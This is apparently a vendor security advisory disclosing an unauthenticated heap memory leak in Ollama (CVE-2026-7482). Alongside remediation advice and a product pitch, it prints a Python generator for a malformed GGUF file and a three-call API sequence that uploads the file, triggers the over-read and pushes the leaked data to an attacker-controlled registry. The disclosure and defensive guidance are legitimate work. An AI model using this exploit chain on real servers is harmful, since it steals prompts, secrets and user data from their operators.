Bleeding Llama: A Critical Memory Leak in the World's Most Popular Local AI Platform
SECURITY ADVISORY
Bleeding Llama
Critical Unauthenticated Memory Leak in Ollama
CVE-2026-7482 • CVSS 9.1 CRITICAL
Vulnerability Unauthenticated Heap Memory Leak (Out-of-Bounds Read)
CVE ID CVE-2026-7482
CVSS Score 9.1 - CRITICAL
Affected Product Ollama (all versions prior to patch)
Attack Vector Remote, Unauthenticated - 3 API calls
Exposed Servers ~300,000 internet-facing instances
Discovered By Cyera Research
What We Found
Cyera's research team discovered a critical memory-leak vulnerability in Ollama, the world's most popular platform for running large language models (LLMs) locally.
With over 170,000 GitHub stars and 100 million Docker Hub downloads, Ollama is widely used across enterprises as a self-hosted AI inference engine.
The Vulnerability
The bug is an out-of-bounds heap read in Ollama's model quantization pipeline. When a user creates a model from an uploaded GGUF file (the standard format for storing LLM weights), Ollama reads the tensor data the file declares. A malicious actor can craft a GGUF file that declares a far larger tensor size than the data it actually contains, forcing Ollama to read well beyond the intended buffer boundary - scooping up sensitive data stored on the heap, such as system prompts, user messages, environment variables, and more.
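To make the mechanics concrete, here is a minimal sketch of the file-format trick: a GGUF-style file whose tensor-info record declares far more elements than the file actually carries. This is a simplified illustration, not a working exploit - the tensor name and sizes are placeholders, and a real GGUF file also needs metadata keys (such as general.architecture) that Ollama requires before it will process the file.

```python
import struct

def gguf_string(s: str) -> bytes:
    """GGUF strings are a little-endian uint64 length followed by UTF-8 bytes."""
    b = s.encode("utf-8")
    return struct.pack("<Q", len(b)) + b

# --- Simplified GGUF v3 skeleton (illustration only) ---
# Header: magic, version, tensor count, metadata key-value count.
out = b"GGUF"
out += struct.pack("<I", 3)   # GGUF version 3
out += struct.pack("<Q", 1)   # one tensor
out += struct.pack("<Q", 0)   # no metadata (a real file needs several keys)

# Tensor-info record: name, n_dims, dims, ggml dtype, data offset.
# The declared shape claims ~64 MiB of float32 elements ...
declared_elements = 16 * 1024 * 1024
out += gguf_string("blk.0.attn_q.weight")     # placeholder tensor name
out += struct.pack("<I", 1)                   # one dimension
out += struct.pack("<Q", declared_elements)   # inflated element count
out += struct.pack("<I", 0)                   # dtype 0 = GGML_TYPE_F32
out += struct.pack("<Q", 0)                   # data offset

# ... but only 4 KiB of actual tensor data follows. A reader that trusts the
# declared count walks ~64 MiB past this buffer into adjacent heap memory.
# The fix: validate declared_elements * dtype_size against the actual buffer
# size before any quantization loop runs.
out += b"\x00" * 4096

with open("inflated.gguf", "wb") as f:
    f.write(out)
```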
The attacker then leverages Ollama's built-in model push feature to exfiltrate the resulting file - complete with stolen heap data - to an attacker-controlled server.
The entire attack requires only three unauthenticated API calls:
Step 1
POST /api/blobs/sha256:…
Upload crafted GGUF file with inflated tensor shape
Step 2
POST /api/create
Trigger model creation - out-of-bounds read fills model file with heap data
Step 3
POST /api/push
Push model (and embedded heap data) to attacker-controlled server
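Assuming a vulnerable instance at a hypothetical victim address, the three calls might look like the sketch below. The endpoint paths match Ollama's public API, but the JSON field names (model, files, quantize) are approximations that vary across Ollama versions, and the digest must match the uploaded blob.

```python
import hashlib
import requests

OLLAMA_URL = "http://victim:11434"   # hypothetical vulnerable target

# Step 1: upload the crafted GGUF as a content-addressed blob.
blob = open("inflated.gguf", "rb").read()
digest = "sha256:" + hashlib.sha256(blob).hexdigest()
requests.post(f"{OLLAMA_URL}/api/blobs/{digest}", data=blob)

# Step 2: create a model from the blob. The quantization path trusts the
# inflated tensor shape, reads past the buffer, and bakes heap memory into
# the resulting model file. (Payload shape is approximate.)
requests.post(f"{OLLAMA_URL}/api/create", json={
    "model": "attacker/leaky:latest",
    "files": {"inflated.gguf": digest},
    "quantize": "q4_K_M",
})

# Step 3: push the model - embedded heap data and all - to a registry the
# attacker controls.
requests.post(f"{OLLAMA_URL}/api/push", json={
    "model": "attacker/leaky:latest",
    "insecure": True,
})
```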
What Is the Impact
Ollama ships with no authentication, and common deployments (including the official Docker image) bind to all network interfaces (0.0.0.0). With approximately 300,000 Ollama servers currently exposed on the public internet, this vulnerability is immediately and broadly exploitable - no credentials required.
What an Attacker Can Steal
Directly from AI Conversations
- User prompts and chat messages
- System prompts from all running models
- Conversation history across all users
From the Host Environment
- Environment variables (API keys, tokens, secrets)
- Proprietary code submitted to the AI
- Customer data and contracts reviewed via AI
Who Is Most at Risk
- Enterprises using Ollama as a shared internal AI assistant - every employee interaction is potentially exposed.
- Development teams using Claude Code or similar agentic tools routed through Ollama - tool outputs, file contents, and code are all in scope.
- Organizations in regulated industries (healthcare, finance, legal) where prompt content may include PII, PHI, or privileged information.
- Any deployment where Ollama is network-accessible without a firewall or authentication proxy in front of it.
What You Should Do
Organizations running Ollama should treat this as a Priority 1 incident and take the following actions immediately:
Immediate Actions (Within 24 Hours)
- 1. Patch Ollama: Apply the vendor-released fix. The patch validates tensor element counts against actual buffer sizes before any quantization loop executes.
- 2. Restrict network access: If patching is not immediately possible, block external access to Ollama's default port (11434) at the firewall level. Ollama should never be internet-facing without authentication.
- 3. Audit running instances: Use your asset inventory or tools like Shodan to identify any Ollama instances exposed on public IPs within your organization (a minimal probe sketch follows this list).
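As a starting point for the audit in item 3, the sketch below probes a placeholder host list for an unauthenticated Ollama API on the default port. GET /api/version is a lightweight Ollama endpoint that returns the server version; an unauthenticated 200 response suggests the rest of the API is reachable too.

```python
import requests

# Hypothetical inventory of addresses to check - replace with your own.
HOSTS = ["10.0.0.5", "10.0.1.12", "203.0.113.7"]

for host in HOSTS:
    url = f"http://{host}:11434/api/version"
    try:
        resp = requests.get(url, timeout=3)
        if resp.ok:
            # An unauthenticated 200 here means the full API - including
            # /api/blobs, /api/create, and /api/push - is likely reachable.
            print(f"[!] {host}: exposed Ollama {resp.json().get('version', '?')}")
    except requests.RequestException:
        pass  # closed port, filtered, or not Ollama
```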
Short-Term Hardening (Within 1 Week)
- Enable authentication: Deploy an authentication proxy or API gateway in front of all Ollama instances. No Ollama API endpoint should be reachable without credentials (an illustrative proxy sketch follows this list).
- Rotate exposed secrets: If your Ollama server was internet-accessible, assume environment variables and secrets in memory may be compromised. Rotate API keys, tokens, and credentials immediately.
- Review agentic integrations: Audit any Claude Code, LangChain, or other tool integrations routing traffic through Ollama. All data passed through these tools should be treated as potentially disclosed.
- Network segmentation: Ensure Ollama servers are on isolated network segments with strict egress controls to prevent future exfiltration attempts.
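Purely to illustrate the authentication-proxy pattern from the first item above, here is a minimal bearer-token reverse proxy sketch. The token, ports, and upstream address are placeholders; a production deployment should use a hardened gateway with TLS rather than this sketch.

```python
import http.server
import urllib.error
import urllib.request

UPSTREAM = "http://127.0.0.1:11434"           # Ollama bound to loopback only
TOKEN = "replace-with-a-long-random-secret"   # placeholder credential

class AuthProxy(http.server.BaseHTTPRequestHandler):
    def _forward(self):
        # Reject any request without the expected bearer token.
        if self.headers.get("Authorization") != f"Bearer {TOKEN}":
            self.send_error(401, "missing or invalid token")
            return
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else None
        req = urllib.request.Request(UPSTREAM + self.path, data=body,
                                     method=self.command)
        ctype = self.headers.get("Content-Type")
        if ctype:
            req.add_header("Content-Type", ctype)
        try:
            with urllib.request.urlopen(req, timeout=600) as resp:
                status, headers, payload = resp.status, resp.headers, resp.read()
        except urllib.error.HTTPError as e:
            # Pass upstream 4xx/5xx responses straight through.
            status, headers, payload = e.code, e.headers, e.read()
        # Note: this buffers whole responses, so streaming replies arrive only
        # once complete - an acceptable trade-off for a sketch.
        self.send_response(status)
        self.send_header("Content-Type",
                         headers.get("Content-Type", "application/json"))
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    do_GET = do_POST = do_DELETE = _forward

if __name__ == "__main__":
    http.server.ThreadingHTTPServer(("0.0.0.0", 8080), AuthProxy).serve_forever()
```

With Ollama bound to loopback and only the proxy exposed, unauthenticated requests never reach the API at all.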
How Cyera Can Help
Cyera's data security platform gives organizations the visibility and control needed to assess exposure from vulnerabilities like Bleeding Llama and prevent data exfiltration across AI workloads.
Data Discovery & Classification
Identify sensitive data flows into AI systems - including what employees are submitting to Ollama. Cyera continuously maps where PII, credentials, proprietary code, and regulated data exist across your environment so you know exactly what was at risk.
AI Risk Posture Assessment
Assess your organization's exposure to AI infrastructure vulnerabilities. Cyera can identify unauthenticated or misconfigured AI inference endpoints, flag internet-facing Ollama instances, and provide a risk-prioritized remediation roadmap.
Data Loss Prevention for AI Workloads
Enforce policies that prevent sensitive data from being submitted to AI endpoints without authorization. Cyera's DLP capabilities extend to agentic pipelines and developer tooling, including integrations like Claude Code, ensuring sensitive outputs cannot be silently exfiltrated.
Threat Detection & Incident Response
Detect anomalous access patterns and data movement consistent with exploitation of vulnerabilities like CVE-2026-7482. Cyera's threat intelligence capabilities help security teams investigate potential past exposure and understand the blast radius of a breach.